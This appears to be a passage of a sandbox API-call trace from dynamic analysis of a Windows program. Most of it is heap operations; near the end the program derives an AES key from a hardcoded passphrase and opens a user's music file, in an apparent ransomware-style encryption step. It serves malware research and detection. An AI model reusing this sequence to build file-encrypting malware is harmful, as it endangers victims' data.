hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.274] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.274] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.274] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4260 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0115.277] CloseHandle (hObject=0x258) returned 1 [0115.277] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.277] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0115.277] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4a8760, ftCreationTime.dwHighDateTime=0x1d5e604, ftLastAccessTime.dwLowDateTime=0x1d7d5360, ftLastAccessTime.dwHighDateTime=0x1d5ee73, ftLastWriteTime.dwLowDateTime=0x1d7d5360, ftLastWriteTime.dwHighDateTime=0x1d5ee73, nFileSizeHigh=0x0, nFileSizeLow=0xafc6, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="4YRCHooZsp.mp3", cAlternateFileName="4YRCHO~1.MP3")) returned 0x41ac200 [0115.277] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0115.277] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0115.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0115.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0115.278] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a4590) returned 1 [0115.278] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0115.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.278] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0115.278] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.279] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caaa8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0115.279] CryptCreateHash (in: hProv=0x41a4590, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.279] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cacd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0115.279] CryptHashData (hHash=0x41ac200, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0115.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.279] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0115.280] CryptDeriveKey (in: hProv=0x41a4590, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac700) returned 1 [0115.280] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.280] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0115.280] CryptDestroyHash (hHash=0x41ac200) returned 1 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0115.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0115.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.281] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0115.281] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0115.281] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0115.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.321] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\4yrchoozsp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0115.321] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.321] 